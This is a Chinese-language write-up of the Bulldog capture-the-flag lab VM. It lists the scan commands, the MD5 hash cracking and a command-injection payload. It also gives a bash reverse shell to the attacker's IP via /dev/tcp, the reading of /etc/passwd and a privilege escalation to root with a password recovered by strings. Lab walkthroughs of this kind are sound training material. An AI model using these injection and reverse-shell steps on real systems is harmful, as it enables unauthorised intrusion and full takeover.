運行環境:
測試機:kali
靶機:bulludog
主機發現
arp-scan -l
或者
netdiscover -i eth0 -r 192.168.223.0/24
或者
nmap -sn 192.168.223.0/24 -oG - (不管是不是自己都要掃)
掃描出來是192.168.223.233
端口掃描
masscan --rate=10000 -p0-65535 192.168.223.233
masscan掃描速度快,但準確度不高,可以多掃幾次,以防漏掃
或者
nmap -sS 192.168.223.132
服務識別
nmap -sV 192.168.223.233 -p23,8080,80
發現漏洞並識別
1.瀏覽器訪問 http://192.168.223.233
沒有發現什麼可用的
目錄掃描
發現2個大的目錄,一個是admin,一個是dev
來嘗試訪問一下 192.168.223.233/admin/login,嘗試弱密碼登錄,失敗
查看一下網頁源碼,沒有什麼發現
我們再來看下另一個目錄 192.168.223.233/dev
可以知道,完全刪除了php和可以使用ssh,從之前端口掃描,我們可以知道ssh端口是23
點擊web-shell,看能不能獲取shh
點進去之後獲取ssh失敗,說必須以服務器身份登錄纔行
我們在回到之前的 192.168.223.233/dev 來查看一下源碼,可以看到註釋有MD5(Django)的字符串,
挨着順序解密,發現只有最後2個可以解密出來,bulldog bulldoglover
嘗試用解密出來的值做密碼,解密前面的郵箱作爲賬號登錄,
失敗
嘗試用郵箱開頭做賬號,解密值做密碼,成功登錄,但是發現沒有任何權限
用另一個也是一樣,成功登錄,但是發現沒有任何權限
這時候再打開172.168.111.90/dev頁面,發現剛纔的web shell能用了
不過好像只能用系統給出的幾個命令。先試一下有沒有命令注
ifconfig&whoami
根據反饋結果判斷存在命令注入,那接下來就好辦了。
在攻擊機kali中打開命令終端開始監聽,輸入nc -lvnp 6666
嘗試bash反彈,在靶機打開的網頁命令框中輸入
echo “bash -i >& /dev/tcp/192.168.223.34/6666 0>&1″ | bash
使用echo命令反彈shell成功
首先查看有哪些系統用戶,cat /etc/passwd。發現了一個重點對象:bulldogadmin
然後,查找他的文件 find / -user bulldogadmin 2>/dev/null
發現有hiddenadmindirectory隱藏目錄,用less命令打開裏面包含的文件看看,比如打開note看看
我也不知道是啥意思,那就百度翻譯一下
我們再來看另一個,
發現是亂碼,我們用 strings 來看一下這個文件
strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
噗,看到一堆英文字符,但是依然可以很輕鬆的看出文件中間有一個被 H 大段的PASSWORD的單詞。於是把前後段去掉H ,得到SUPERultimatePASSWORDyouCANTget 把她保存着,可能需要這個密碼
su命令執行一下,提示需要一個終端,
網查了一下資料,可以用python調用本地的shell,命令:
python -c ‘import pty;pty.spawn("/bin/bash")’
然後執行命令 sudo su – ,輸入剛纔記下來的的密碼試一下,結果成功獲得root權限,拿到flag
輸入ls命令,發現裏面只有一個文本文檔
輸入 cat congrats.txt 打開看下
這裏要解釋一下,我這裏的雙寫
比如這個 其實就是sudo su -
總結:
主機發現
端口掃描
服務發現
然後查看web服務
爆破出目錄admin和dev頁面
利用解密MD5得到的密碼登錄系統,然後繞過系統權限
命令執行
反彈shell
提權